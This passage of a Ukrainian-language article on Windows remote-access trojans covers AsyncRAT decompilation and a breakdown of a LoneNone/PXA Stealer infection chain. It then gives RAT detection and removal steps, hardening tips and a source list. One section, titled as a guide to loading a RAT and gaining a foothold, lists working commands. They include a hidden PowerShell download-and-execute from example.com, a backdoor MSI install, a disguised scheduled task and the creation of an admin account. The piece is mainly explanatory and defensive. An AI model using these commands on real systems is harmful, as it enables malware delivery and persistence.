5. Можна також спробувати декомпілювати деобфускований файл клієнта в Linux з допомогою модуля ILSpy. Приклад: dotnet ICSharpCode.ILSpyCmd/bin/Debug/net10.0/ilspycmd.dll -p -o AsyncRat_Source ~/AsyncRAT/clients-files/svchost.exe. На виході в зазначеній папці отримаємо повну структуру файлу, в якій залишається просто знайти відповідні рядки пошуком grep.

Як найшвидше завантажити RAT та закріпитись у цільовій системі?

Найпростішим і найшвидшим методом, як вже зазначалося вище, є закачування шкідливих навантажень через службові бінарники, себто вбудовані утиліти Windows, які йдуть з “коробки” і не додають “мотву”. Ба більше, не вимагають привілеїв Адміністратора. В іншому випадку, якщо ви скопіюєте шкідливий файл з саморозгорнутого Python-сервера, VPS або USB-флешки, то усі ці файли, найімовірніше, будуть моментально помічені та вилучені Windows Defender.

Приклади робочих команд:

• bitsadmin /transfer myjob /download /priority high http://7-zip.org/a/7z1604-x64.exe "C:\Users\Admin\7z.exe" – стандартна утиліта Windows для службових задач (працює лише з HTTPS).
• curl -o C:\Users\Public\archive.zip http://example.com/archive.zip – утиліта Сurl, включена в Windows 10/11.
• tar -xf C:\Users\Public\archive.zip -C C:\Users\Public\ – утиліта TAR для розпакування ZIP-архівів, включена в Windows 10/11.
• rar.exe x -ibck -y -p<password> file.pdf C:\User\Admin – консольна утиліта WinRAR для розпакування RAR-архівів (розпізнає навіть замасковані файли).
• certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe – службова утиліта Windows (з недавнього часу блокуватися Windows Defender’ом)
• Invoke-WebRequest -Uri "http://7-zip.org/a/7z1604-x64.exe" -OutFile ":\Users\Admin\7z.exe" – завантаження файлу в PowerShell.
• C:\Windows\System32\msiexec.exe /q /i http://example.com/backdoor.msi – службова утиліта Windows для завантаження MSI-інсталлерів.
• powershell -WindowStyle Hidden -Command "& {iwr 'http://example.com/malware.exe' -OutFile 'C:\Users\Admin\malware.exe'; Start-Process 'C:\Users\Admin\malware.exe' -ArgumentList 'run' -WindowStyle Hidden}" – багатоетапна команда CMD, яка запускає консоль PowerShell з командою завантаження і запуску виконуваного файлу в прихованому режимі.
• expand-archive -force -path C:\Users\Admin\malware.zip -destinationpath C:\ProgramData\ – команда PowerShell для розпакування ZIP-архіву до вказаної директорії.
• schtasks /create /sc DAILY /tn \"Google Update Service\" /tr \"C:\ProgramData\GoogleUpdate\GoogleUpdateService.exe\" /mo 1 /st 10:00 – команда створення завдання в планувальнику Windows для запуску шкідливого файлу, який мімікрує під службу оновлення Google.
• net user hacker 123456 /add і net localgroup administrators hacker /add – створити нового користувача з правами адміністратора.

Приклад доставки пейлоаду і обходу захисту Windows в’єтнамською APT-групою LoneNone:

cmd /c cd _ && start Tax-Invoice-EV.docx && certutil -decode Document.pdf Invoice.pdf && images.png x -ibck -y -poX3ff7b6Bfi76keXy3xmSWnX0uqsFYur Invoice.pdf C:\Users\Public && start C:\Users\Public\Windows\svchost.exe C:\Users\Public\Windows\Lib\images.png MR_Q_NEW_VER_BOT && del /s /q Document.pdf && del /s /q Invoice.pdf && exit && exit

1. Хакер здійснює цільову фішингову атаку (spead phishing) з застосуванням соцінженерії (наприклад, фейкова претензія до порушення авторських прав), надіславши їй на корпоративну пошту контейнер – ZIP-архів. Або створює фішинговий сайт і заганяє на неї жертву для скачування. В ZIP-архіві 2 файли – один офісний DOCX-файл (насправді переіменований winword.exe, що є легітимною підписаною програмою Microsoft Office 2013), інший – прихований файл, бібліотека DLL з пакету MS Office 2013 (msvcr100.dll, C Runtime Library).
2. Жертва розпаковує ZIP нічого не підозрюючи. Після виконання фальшивого DOCX (winword.exe), Windows підвантажує для його роботи DLL-файл з локального каталогу, який містить у своєму коді команди для створення дроппера Evidence.cmd для багатоетапних команд консолі Windows в тихому режимі. Ця техніка має назву – DLL Sideloading.
3. cmd /c cd _ — скрипт відкриває нове вікно командного рядка з переходом у каталог _ (найімовірніше, створений заздалегідь).
4. start Tax-Invoice-EV.docx — winword.exe відкриває абсолютно легітимний документ-приманку Microsoft Word: Tax-Invoice-EV.docx.
5. certutil -decode Document.pdf Invoice.pdf — Ключовий момент.  Утиліта certutil (легітимний інструмент Windows) використовується для декодування файлу Document.pdf (який насправді є закодованим в base64 запароленим RAR-архівом) у файл Invoice.pdf. Це обхід Windows Defender (Smart App).
6. images.png x -ibck -y -pX3ff7b6Bfi76keXy3xmSWnX0uqsFYur Invoice.pdf C:\Users\Public – Найцікавіша частина. Файл images.png це насправді переіменований Rar.exe (консольна версія архіватора WinRAR). Ну а Invoice.pdf – як вже було згадано вище, звичайний переіменований RAR-архів. Отже, хакер просто розпаковує архів (ключ -ibck – фоновий режим, ключ -y – прийняти всі діалоги) вказуючи пароль до нього в ключі -p до вказаної директорії. В архіві лежить шкідливий файл-ратник svchost.exe, замаскований під системний процес (очевидно з підробленими даними вендора Assembly). 
7. start C:\Users\Public\Windows\svchost.exe C:\Users\Public\Windows\Lib\images.png MR_Q_NEW_VER_BOT – запускається портативний Python-інтерпретатор (попередньо переіменований в svchost.exe) для виконання шкідливого Python-коду замаскованого під файл зображення images.png (PXA Stealer), плюс додається BotFather ключ для зв’язку з Telegram-ботом. Обидва файли містилися в RAR-архіві Invoice.pdf, який мав структуру: /Windows/svchost.exe, /Windows/Lib/images.png.
8. del /s /q Document.pdf && del /s /q Invoice.pdf && exit && exit – по закінченні вилучаються всі фейкові файли та підчищаються сліди.

Всю атаку можна розділити на класичні етапи розгортання шкідливого програмного забезпечення по сценарію Red Team: Command and Scripting -> Persistence -> Privilege Escalation -> Defense Evasion -> Discovery -> Command and Control (C2).

Ця атака доводить одну важливу річ: Desktop – оманливий. Якщо вам щось треба перевірити – перевіряйте в Backend! Те, що ви бачите на своєму екрані, робочому столі чи в експлорері Windows – у командному рядку насправді може виглядати зовсім по-іншому, ба більше нелегітимно… Тому вкотре наголошую, Linux безпечніший за Windows. У Linux менша поверхня атак і менше користувацького ризику. За комфортом та дизайном Windows ховається величезний ризик… Хоча навіть у цьому плані Linux вже давно йому конкурент, при цьому ще й абсолютно прозорий, невимогливий до ресурсів, безкоштовний. Різноманітний. Одних дистрибутивів Linux більше 10-ти!

У подальшому хакери придумуватимуть нові й нові загрози, стратегії, техніки і методики обфускації, компрометації, нові точки входу… Тому Windows Defender залишиться без вибору, як максимально закрутити гайки до рівня “екстримальної безпеки і телеметрії”, введуть обов’язкові цифрові підписи для всіх EXE (PE), що зовсім погіршить користувацький досвід і позбавить користувача найціннішого – Свободи. Мережа користувачів Windows нагадуватиме великий цифровий концтабір. І ця ситуація явно не на користь “Вікон”… Користувачу від цього легше не буде. А хакерам не стане гірше.

Так що, майбутнє за іксами!

Як виявити та видалити RAT з Windows?

Перший “дзвіночок” дії RAT – це зменшення швидкодії комп’ютера. Повільний інтернет та помилки інтернет-з’єднання. Повільне виконання задач і запуск додатків. Повільний старт системи. Більшість RATників здійснюють серйозне навантаження на оперативну пам’ять і центральний процесор. Також може з’явитися велика кількість підозрілих багів, глюків, процесів, файлів, папок, мережевих пакетів і http-запитів з/до сторонніх ресурсів. В браузері можуть автоматично відкриватися незнайомі сайти, випадати рекламні popup банери, здійснюватися приховані редиректи та багато іншого.

Список необхідних дій:

• Терміново перезавантажити систему. Деякі примітивні віруси не можуть закріпитися в системі, тому банальне перезавантаження уб’є шкідливий процес.
• Перевірити усі активні процеси (Ctrl+Shift+Esc). Особливу увагу звернути на фейкові svchost.exe. Як правило вони cидять у користувацьких папках, як от AppData/Roaming. Легітимний процес зазвичай знаходиться в C:\Windows\System32\svchost.exe. Для поглибленого вивчення процесів варто скористатись додатком Process Hacker.
• Перевірити автозавантаження (Win+R, msconfig). Для поглибленого аналізу скористатись утилітою Windows – Autoruns. Також перевірити назву в BleepingComputer Startup Programs Database.
• Відкрити Resource Monitor (Win + R, resmon) й відстежувати споживання системних ресурсів.
• Перевірити користувачів системи (Win + R, lusrmgr.msc).
• Перевірити заплановані завдання (Win +R, taskschd.msc) і через CMD: schtasks /query /fo LIST /v
• Перевірити торент-клієнти і процеси. Проаналізувати мережевий трафік з допомогою Bimi/Malwarebytes Windows Firewall Control і Portmaster. Досвідченим можна спробувати попоміторити через Wireshark. Хакери люблять використовувати клієнтів для вбудовування майнерів, монетизації реклами, роздачі торентів і організації бот-нет мереж.
• Також переглянути такі дашборди і дерикторії як: Диспетчер задач, Локальні папки, Temp/AppData (рекомендовано), C:\Users\windows\AppData\Roaming\Microsoft\Windows, Program Files (x86)/Program Files, System32, користувацькі директорії. Обов’язково увімкнути відображення прихованих файлів та папок (Win + R, control folders).
• Перевірити реєстр (Win + R, regedit), а саме: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. Утиліта RegShot дозволить порівняти усі зміни в реєстрі.
• Переглянути вміст файлу hosts. Повернути його до вигляду по замовчуванню.
• Перейти у властивості системи (Computer -> Properties -> Advanced System Settings -> Advanced -> Environment Variables) і перевірити змінні середовища. Там не має бути нічого зайвого та підозрілого.
• Перейти у властивості системи (Computer -> Properties -> Advanced System Settings -> Remote) і вимкнути функцію “Віддалений робочий стіл”.
• Вилучити будь-які додатки, які можуть проявляти зайву активність або втручатися в системні процеси. Очистити дані браузерів, бажано повністю вилучити старі профілі та створити нові. Можна скористатися утилітами для сервісного обслуговування Revo Uninstaller та ССleaner.
• Якщо нічого не допомагає, можна спробувати спеціалізоване антивірусне програмне забезпечення, таке як Malwarebytes Support, Malwarebytes Anti-Malware, BleepingComputer Rkill або Microsoft Safety Scanner.

Якщо вірус потужний і зашифрований, то без форматування усіх розділів і комплексного очищення системи не обійтись. В іншому випадку немає гарантії, що навіть після часткового очищення в майбутньому якісь залишки шкідливого ПЗ не приведуть до повторної атаки і компрометації. Майте при собі завантажувальну USB-флешку з ОС Windows, щоб у потрібний момент завантажитись, здійснити діагностику і перевстановлення системи.

Не зайвим буде оновити усі паролі, перевірити усі доступи до всіх сервісів, облікових записів, сервісів та онлайн-кабінетів, криптогаманців, увімкнути всюди де можна двофакторну авторизацію 2FA, змінити електронні пошти і прив’язані номери телефонів.

Поради і рекомендації щодо захисту ОС Windows від RAT

• Не використовувати операційну систему Windows, нижче 10-ї. Встановити усі останні патчі і доповнення безпеки Windows. У жодному випадку не закачувати “безкоштовні” Windows з торентів або сайтів. Використовувати виключно стандартизоване ліцензійне програмне забезпечення, або перейти на безкоштовний Linux.
• Не запускати зламані або перепрошиті додатки: кейгени, KMS-активатори, кряки, чіти і т.д. Вони можуть містити закодований зловмисний код (майнери/шифрувальники), який звичайні антивіруси не бачать.
• Тримати постійно включеним Microsoft Windows Defender. Більшість поширених загроз вчасно ним виявляються і блокуються.
• Користуватися сучасними, добре відомими і оновленими до останніх офіційних версій інтернет-браузерами, які містять усі необхідні модулі безпеки – Firefox / Chrome. Деякі застарілі браузери не застосовують мітки MotW, чим ставлять під загрозу безпеку користувачів. Перевіряти URL-адреси сайтів. Браузери на движку Chrome більш чутливі до атак стилерами, тому в ідеалі краще використовувати тільки Firefox-подібні браузери (Mullvad Browser, LibreWolf, WaterFox). Не зберігати паролі в браузері, для цього існують такі додатки як KepassXC. Періодично очищати історію та cookie браузера, щоб не було такого. Використовувати розширення для браузера – uBlock Origin та uMatrix, які містять напрацьовані malware-аналітиками списки фішингових, шкідливих ресурсів та заблокують будь-які спроби доступу до них.
• Не відкривати посилання і не скачувати жодних файлів від підозрілих або незнайомих email-адресатів. Навчитися розпізнавати фішинг-атаки і боротися з ними. Будь-які вкладення, посилання та інші об’єкти в email-листах перевіряти антивірусом або сервісом VirusTotal. Email-заголовки листів перевіряти в онлайн-сервісі PhishTool.
• Встановіть останню версію архіватора WinRAR. Перейдіть в налаштування і увімкніть маркування MotW для всіх файлів. ZIP-файли бажано розпаковувати лише вбудованими засобами Windows – в них завжди зберігається позначка безпеки. Не рекомендуємо використовувати додаток 7-Zip.
• Перевіряти хеш-суми (SHA, MD5) завантажених пакетів та звіряти їх з контрольними сумами розробника, щоб не потрапити на підробку. Можна завантажити додаток HashCheck для Windows, який інтегрує цю функцію в контекстному меню.
• Не зайвим буде встановити чудовий додаток Detect It Easу (Die.exe), який підтриує сигнатурний і евристичний аналіз та забезпечує швидку і ефективну реверс-перевірку файлів на наявність шкідливих функцій.
• Налаштувати безпеку пакету Microsoft Office. Увімкнути захищений режим і заблокувати виконання сценаріїв/макросів/VBA-скриптів/HTTP-запитів в: Word, Excel, PowerPoint. Аналогічно зробити це в Adobe Acrobat Reader/Foxit Reader (заборона JavaScript). Не встановлювати жодних додаткових плагінів й надлаштунків, яких не знаєте. Не використовувати застарілі версії цих додатків.
• Додатково розгорнути мережевий файєрвол, наприклад Malwarebytes/BIMI Windows Firewall Control. Відстежувати трафік додатків через Portmaster або Fiddler (проксі). Утиліта Windows TCPview покаже повний список TCP/UDP з’єднань.
• Системним адміністраторам рекомендується налаштувати правильні групові політики, правило найменших привілеїв для користувачів системи, білі і чорні списки додатків. Виконувати регулярне планове сканування і резервне копіювання всіх даних. Аналізувати системні процеси та вимірювати швидкодію.

Джерела та посилання

1. GitHub.Ultimate RAT Collection.
2. GitHub. Windows Remote Access Tools
3. GitHub. Ransomware Database.
4. Learn Windows. Attack surface reduction rules overview
5. Аналіз технік хакерської групи C.A.S.
6. Аналіз технік хакерської групи Crypt Ghouls
7. LOLBAS Project
8. GitHub. Privesc Check Windows scipt.
9. GitHub. Malware Analysis Writeups. RevengeRAT.
10. GitHub. Awesome Windows Injection.
11. GitHub. PowerShell Obfuscation Bible.
12. GitHub. Supernova – shellcode encryptor and obfuscator
13. GitHub. Nimbo C2.
14. Youtube. How to download and use Revenge-RAT v0.3 [Tutorial]
15. GitHub. Mimikatz.
16. GitHub. PackMyPayload – Emerging Threat of Containerized Malware
17. GitHub. RedBook. Mark-of-the-Web (MotW) Bypass
18. RedCanary. Mark of the Web Bypass.
19. SANS. Mark of the Web. Some Technical Details.
20. Outflank. Mark-of-the-Web from a Red Team’s Perspective
21. ASEC. Mark of the Web (MoTW) Bypass Vulnerability
22. Bleeping Computer. 7-zip now supports Windows ‘Mark-of-the-Web’ security feature
23. GitHub. Mgeeky. Penetration Testing Tools.
24. The Hacker Recipes.
25. The Red Book.
26. HackTricks.
27. GitHub. List of .NET deobfuscators
28. GitHub. PersistHound – local Windows persistence
29. GitHub. PowerShell remove MotW.
30. GitHub. Comparison of MOTW (Mark of the Web) propagation support of archiver software for Windows
31. Ericlaw. Downloads and mark of the web.
32. Ericlaw. SmartScreen Application Reputation, with Pictures
33. Chrome Security User Interface List.
34. elastic security labs. Dismantling Smart App Control
35. No Longer Set. Details about the Mark-of-the-Web (MOTW)
36. 7-Zip: From Uninitialized Memory to Remote Code Execution
37. Sentinel LABS. DragonSpark | Attacks Evade Detection with SparkRAT and Golang Source Code Interpretation
38. Sentinel LABS. Ghost in the Zip | New PXA Stealer and Its Telegram-Powered Ecosystem
39. Sentinel LABS. Operation Digital Eye | Chinese APT Compromises Critical Digital Infrastructure via Visual Studio Code Tunnels
40. Hunt.io. Spotting SparkRAT: Detection Tactics & Sandbox Findings
41. GitHub. Remote Administration Tools Archive.
42. CYBLE. Reputation Hijacking with JamPlus: A Maneuver to Bypass Smart App Control (SAC)
43. Приклад атаки LoneNone. Windows Smart App Bypass.
44. Cisco TALOS. New PXA Stealer targets government and education sectors for sensitive information
45. GitHub. LoneNone.
46. BSL. Chasing a Ghost : PXA Stealer Part 2
47. GitHub. Malware Collection.
48. GitHub. Стиллер с GitHub: вирусология
49. GitHub. Chrome password stealer
50. HABR. Стиллер паролей на python с отправкой на почту
51. GitHub. Stealers Collection.
52. GitHub. Defendnot.
53. GitHub.NjRAT All Versions.
54. The Hacker News. Multi-Stage Phishing Campaign Targets Russia with Amnesia RAT and Ransomware
55. Official website NjRAT
56. Telegraph. njCrypter.
57. GitHub. NjCrypter.
58. Youtube. NjRat Server Crypter Криптор для вирусов троянов стиллера 2017
59. Trellix. APT28’s Stealthy Multi-Stage Campaign Leveraging CVE‑2026‑21509 and Cloud C2 Infrastructure
60. VENOM 1.0.17 – metasploit Shellcode generator/compiller
61. Red Team Notes
62. GitHub. PandoraBox
63. Fortinet. Inside a Multi-Stage Windows Malware Campaign
64. Wikipedia. List of file signatures.
65. GCK File Signature Table Powered by SEARCH
66. Aldeid. Penetration Testing Wiki
67. GitHub.theZoo. Malware Samples.
68. GitHub. Malware Sources.
69. GitHub. Crypters.
70. ANY.RUN. Malware Trends Tracker.

Автор: © Konrad Ravenstone, KR. Laboratories Research